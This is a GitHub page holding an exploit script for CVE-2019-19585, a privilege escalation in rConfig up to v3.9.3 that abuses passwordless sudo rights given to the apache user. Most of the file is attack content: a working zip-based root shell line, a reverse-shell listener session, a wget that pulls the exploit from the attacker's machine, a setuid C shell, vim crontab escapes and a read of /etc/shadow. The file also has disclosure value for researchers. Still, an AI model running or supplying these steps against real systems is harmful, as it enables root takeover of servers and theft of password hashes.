Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice 2 install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh
# curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
#
# Looking at the install scripts, we see that Apache is sudoer.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
# SUDOINSTALLMSG="Updating Sudoers File..."
# echo $SUDOINSTALLMSG;
# echo -ne '##### (33%\r)'
# sleep 1
# echo -ne '############# (66%)\r'
# sleep 1
# echo -ne '##########################(100%)\n'
# echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
# # update sudoers for rconfig specific tasks
# echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers
# echo 'Defaults:apache !requiretty' >> /etc/sudoers
# cat /etc/sudoers >> $LOGFILE 2>&1
# echo -e "${green}Status: Sudoers Updated${reset}\n";
# echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
#
# So if an attacker got a web RCE / Apache shell access, privilege escalation can be done with multiples techniques.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
#
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh
# :shell
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using ZIP
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)
echo "rConfig v3.9.3 - Privilege Escalation"
touch /tmp/LPE.txt
sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)
###########################
# FILE READ using TAIL
###########################
#bash-4.2$ sudo tail -22 /etc/shadow
#sudo tail -22 /etc/shadow
#root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
#bin:*:17834:0:99999:7:::
#daemon:*:17834:0:99999:7:::
# ...
# EOF